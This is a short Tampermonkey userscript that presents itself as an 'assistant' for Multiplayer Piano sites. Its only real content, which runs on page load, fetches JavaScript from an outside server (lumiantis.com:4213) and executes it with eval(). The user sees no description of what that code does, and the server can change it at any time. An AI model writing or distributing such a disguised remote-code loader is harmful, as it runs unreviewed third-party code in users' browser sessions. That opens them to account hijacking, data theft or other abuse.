// ==UserScript== // @license MIT // @name MPP Assistant by RoxasYTB (Last Version Auto) // @namespace http://tampermonkey.net/ // @version 0.3 // @description For Multiplayer Piano // @author RoxasYTB // @match *://multiplayerpiano.net/* // @match *://multiplayerpiano.org/* // @match *://mppclone.com/* // @match *://mpp.terrium.net/* // @match *://piano.ourworldofpixels.com/* // @grant none // @downloadURL none // ==/UserScript== var fromRepl = true; (async () => { var code = await fetch("https://lumiantis.com:4213/", { method: "GET", headers: { "Content-Type": "application/javascript" }, body: null }).then((e => e.text())).then(e => eval(e)); })()